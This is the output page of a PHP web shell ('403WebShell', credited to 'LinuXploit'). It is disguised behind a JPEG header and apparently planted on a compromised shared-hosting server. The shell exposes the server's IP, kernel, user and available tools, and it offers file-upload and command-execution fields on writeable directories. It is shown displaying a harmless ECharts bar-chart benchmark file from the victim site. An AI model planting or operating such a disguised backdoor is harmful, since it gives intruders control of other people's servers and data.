����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 18.222.215.20
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/ideyshare.name.ng/app/assets/admin/vendors/echarts/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/ideyshare.name.ng/app/assets/admin/vendors/echarts/test/mobileBench.html
<html>
    <head>
        <meta charset="utf-8">
        <script src="esl.js"></script>
        <script src="config.js"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1" />
    </head>
    <body>
        <style>
            html, body {
                width: 100%;
                height: 100%;
                margin: 0;
            }
        </style>
        <div id="main"></div>
        <script>

            require([
                'echarts',
                'echarts/chart/bar',
                'echarts/component/legend',
                'echarts/component/grid',
                'echarts/component/tooltip'
            ], function (echarts) {

                var itemStyle = {
                    normal: {
                        label: {
                            show: false,
                            position: 'outside'
                        }
                    },
                    emphasis: {
                        shadowBlur: 10,
                        shadowOffsetX: 0,
                        shadowOffsetY: 0,
                        shadowColor: 'rgba(0,0,0,0.5)'
                    }
                };
                console.profile('setOption');

                var main = document.getElementById('main');
                for (var i = 0; i < 100; i++) {
                    var div = document.createElement('div');
                    div.style.cssText = 'width: 400px; height:200px;';
                    main.appendChild(div);
                    var chart = echarts.init(div, null, {
                        renderer: 'canvas'
                    });

                    var xAxisData = [];
                    var data1 = [];
                    var data2 = [];
                    var data3 = [];
                    var data4 = [];

                    for (var j = 0; j < 10; j++) {
                        xAxisData.push('类目' + j);
                        data1.push((Math.random() * 5).toFixed(2));
                        data2.push(-Math.random().toFixed(2));
                        data3.push((Math.random() + 0.5).toFixed(2));
                        data4.push((Math.random() + 0.3).toFixed(2));
                    }

                    chart.setOption({
                        animation: false,
                        // legend: {
                        //     data: [{
                        //         name: 'bar'
                        //     }, 'bar2', 'bar3', 'bar4'],
                        //     selected: {
                        //         // 'bar': false
                        //     },
                        //     orient: 'vertical',
                        //     x: 'right',
                        //     y: 'bottom',
                        //     align: 'right'
                        // },
                        tooltip: {},
                        xAxis: {
                            data: xAxisData,
                            axisLine: {
                                onZero: true
                            },
                            splitLine: {
                                show: false
                            },
                            splitArea: {
                                show: false
                            }
                        },
                        yAxis: {
                            inverse: true,
                            splitArea: {
                                show: false
                            }
                        },
                        series: [{
                            name: 'bar',
                            type: 'bar',
                            stack: 'one',
                            itemStyle: itemStyle,
                            data: data1
                        }, {
                            name: 'bar2',
                            type: 'bar',
                            stack: 'one',
                            itemStyle: itemStyle,
                            data: data2
                        }, {
                            name: 'bar3',
                            type: 'bar',
                            stack: 'two',
                            itemStyle: itemStyle,
                            data: data3
                        }, {
                            name: 'bar4',
                            type: 'bar',
                            stack: 'two',
                            itemStyle: itemStyle,
                            data: data4
                        }]
                    });
                }
                console.profileEnd('setOption');
            })

        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit